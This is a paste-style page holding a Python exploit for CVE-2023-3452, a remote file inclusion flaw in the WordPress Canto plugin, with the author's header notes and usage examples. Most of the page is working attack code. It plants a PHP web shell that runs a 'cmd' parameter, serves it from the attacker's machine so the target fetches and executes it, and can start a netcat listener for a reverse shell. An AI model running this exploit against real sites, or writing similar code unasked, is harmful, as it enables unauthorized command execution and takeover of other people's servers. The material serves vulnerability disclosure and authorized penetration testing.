Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion and Remote Code Execution - CVE-2023-3452

Mar 1st, 2024
  1. # Exploit Title: Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
  2. # Date: 04/11/2023
  3. # Exploit Author: Leopoldo Angulo (leoanggal1)
  4. # Vendor Homepage: https://wordpress.org/plugins/canto/
  5. # Software Link: https://downloads.wordpress.org/plugin/canto.3.0.4.zip
  6. # Version: All versions of Canto Plugin prior to 3.0.5
  7. # Tested on: Ubuntu 22.04, Wordpress 6.3.2, Canto Plugin 3.0.4
  8. # CVE : CVE-2023-3452
  9.  
  10. #PoC Notes:
#The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Note that allow_url_include is Off by default in PHP (and deprecated since PHP 7.4), so a default install is not exploitable over HTTP this way; the script only succeeds against servers that explicitly enable it. (Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-3452)
  12. #This code exploits the improper handling of the wp_abspath variable in the following line of the "download.php" code:
  13. #... require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php'); ...
#This is just one example: the same unsanitized require_once($_REQUEST['wp_abspath'] . '...') pattern appears in other files of the vulnerable plugin.
  15. # More information in Leoanggal1's Github
  16.  
#!/usr/bin/python3  # NOTE: a shebang is only honoured on line 1 of the file; move it above the header comments if the script should be directly executable
import argparse
import http.server
import os
import shutil
import socket
import socketserver
import subprocess
import threading
import time
import urllib.parse

import requests
  25.  
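# Default payload: a one-line PHP web shell that runs the `cmd` query parameter.
default_web_shell = "<?php system($_GET['cmd']); ?>"


def create_admin_file(local_dir, local_shell=None):
    """Write the PHP payload the target will include as ``<local_dir>/admin.php``.

    The vulnerable ``require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php')``
    appends ``/wp-admin/admin.php`` to the attacker-controlled prefix, so the
    payload has to be reachable under exactly that path below the served root.

    Args:
        local_dir: Directory to create (normally ``wp-admin`` under the
            directory the local HTTP server serves).
        local_shell: Optional path of a local PHP file to use verbatim as the
            payload; when ``None`` the built-in ``default_web_shell`` is written.

    Raises:
        OSError: if the directory cannot be created or the files cannot be
            read or written. A missing ``local_shell`` raises
            ``FileNotFoundError`` before ``admin.php`` is opened, so an
            existing payload is never truncated to an empty file (the original
            opened the destination for writing first).
    """
    os.makedirs(local_dir, exist_ok=True)
    admin_path = os.path.join(local_dir, "admin.php")

    if local_shell:
        # shutil.copyfile fails on a missing/unreadable source before it
        # opens the destination, unlike the original nested open() calls.
        shutil.copyfile(local_shell, admin_path)
    else:
        with open(admin_path, "w") as admin_file:
            admin_file.write(default_web_shell)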
  41.  
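def start_local_server(local_port):
    """Serve the current working directory over HTTP on ``0.0.0.0:local_port``.

    Returns the running ``TCPServer`` immediately: ``serve_forever()`` is run
    on a daemon thread so the caller can continue and call ``shutdown()`` /
    ``server_close()`` when finished. The original blocked inside
    ``serve_forever()`` and its ``return httpd`` was unreachable, which is why
    joining the thread in the caller never returned.

    Args:
        local_port: TCP port to listen on; ``0`` lets the OS pick a free port
            (read it back from ``httpd.server_address``).

    Returns:
        The bound ``socketserver.TCPServer`` instance.

    Security note: ``SimpleHTTPRequestHandler`` exposes everything under the
    current directory, not just the payload, to any host that can reach the
    port (it binds all interfaces). Run it from a scratch directory on an
    isolated network.
    """
    class _ReusableTCPServer(socketserver.TCPServer):
        # Avoid "Address already in use" from a lingering TIME_WAIT socket on re-runs.
        allow_reuse_address = True

    handler = http.server.SimpleHTTPRequestHandler
    httpd = _ReusableTCPServer(("0.0.0.0", local_port), handler)

    print(f"Local web server on port {httpd.server_address[1]}...")
    threading.Thread(target=httpd.serve_forever, daemon=True).start()

    return httpd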
  50.  
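def exploit_rfi(url, local_shell, local_host, local_port, command, nc_port):
    """Trigger the RFI in ``download.php`` and print the target's response.

    Writes the payload to ``wp-admin/admin.php`` in the current directory,
    optionally starts a netcat listener for a reverse shell, serves the current
    directory on ``local_port`` and requests
    ``download.php?wp_abspath=http://<local_host>:<local_port>&cmd=<command>``
    so the target's ``require_once`` fetches and executes the payload. Only
    works when the target has ``allow_url_include`` enabled (off by default).

    Args:
        url: Base URL of the WordPress site, without a trailing slash.
        local_shell: Optional path of a PHP file served instead of the default web shell.
        local_host: IP/hostname the *target* must use to reach this machine.
        local_port: Port for the local HTTP server.
        command: Shell command passed as the ``cmd`` query parameter.
        nc_port: netcat listener port; required when ``local_shell`` is given.

    Raises:
        ValueError: if ``local_shell`` is given without ``nc_port`` (the
            original ran ``nc -lvp None``).
        requests.RequestException: if the request fails or times out.
    """
    # Must be "wp-admin" under the served directory: the target appends
    # "/wp-admin/admin.php" to whatever wp_abspath we send.
    local_dir = "wp-admin"
    create_admin_file(local_dir, local_shell)

    target_url = f"{url}/wp-content/plugins/canto/includes/lib/download.php"
    local_server = f"http://{local_host}:{local_port}"

    listener = None
    if local_shell:
        if nc_port is None:
            raise ValueError("nc_port is required when a reverse-shell file is supplied")
        # "-lvp" is the GNU / nmap-ncat spelling; some OpenBSD nc builds reject
        # -l together with -p and want "nc -l <port>" instead — adjust if needed.
        listener = subprocess.Popen(["nc", "-lvp", str(nc_port)])

    # start_local_server may block in serve_forever(); keep it off the main thread.
    server_thread = threading.Thread(target=start_local_server, args=(local_port,))
    server_thread.daemon = True
    server_thread.start()
    # Don't fire the request until the payload is actually being served.
    _wait_for_port(local_port)

    # urlencode percent-encodes the command so spaces, '&' and '#' survive the
    # query string (the original interpolated it raw).
    query = urllib.parse.urlencode({"wp_abspath": local_server, "cmd": command})
    exploit_url = f"{target_url}?{query}"
    print(f"Exploitation URL: {exploit_url}")

    try:
        # Bounded wait: an unresponsive target must not hang the script.
        response = requests.get(exploit_url, timeout=30)
        print("Server response:")
        print(response.text)
        if listener is not None:
            # Keep the process (and the served payload) alive while nc holds the shell.
            print("netcat listener running; press Ctrl-C when done.")
            listener.wait()
    except KeyboardInterrupt:
        pass
    finally:
        if listener is not None and listener.poll() is None:
            listener.terminate()
        # The HTTP server thread is a daemon and exits with the process; the
        # original joined a thread that never returned and hung here.
        print("Shutting down local web server...")


def _wait_for_port(port, timeout=5.0):
    """Block until 127.0.0.1:``port`` accepts a TCP connection, or ``timeout`` seconds pass."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            socket.create_connection(("127.0.0.1", port), timeout=0.2).close()
            return
        except OSError:
            time.sleep(0.05)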
  77.  
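def main():
    """Parse the command line and launch the exploit.

    argparse already prints usage and exits non-zero on a bad command line
    and handles ``-h`` itself; the original wrapped ``parse_args`` in
    ``except SystemExit`` which printed the help a second time and turned
    every usage error into exit status 0.
    """
    examples = '''
   Examples:
   - Check the vulnerability
   python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33

   - Execute a command
   python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'

   - Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.
   python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php -NC_PORT 4444
   '''
    parser = argparse.ArgumentParser(
        description="Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452",
        epilog=examples,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument("-u", "--url", required=True, help="Vulnerable URL")
    parser.add_argument("-s", "--shell", help="Local file for web shell")
    parser.add_argument("-LHOST", "--local_host", required=True, help="Local web server IP")
    # type=int plus a default replaces the original None check and manual int().
    parser.add_argument("-LPORT", "--local_port", type=int, default=8080, help="Local web server port")
    parser.add_argument("-c", "--command", default="whoami", help="Command to execute on the target")
    parser.add_argument("-NC_PORT", "--nc_port", type=int, help="Listener port for netcat")

    args = parser.parse_args()

    # A reverse shell needs a callback port; reject this before anything is started.
    if args.shell and args.nc_port is None:
        parser.error("-NC_PORT/--nc_port is required when -s/--shell is given")

    # A trailing slash on the URL would double the "/" in front of wp-content.
    exploit_rfi(
        args.url.rstrip("/"),
        args.shell,
        args.local_host,
        args.local_port,
        args.command,
        args.nc_port,
    )


if __name__ == "__main__":
    main()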
  107.            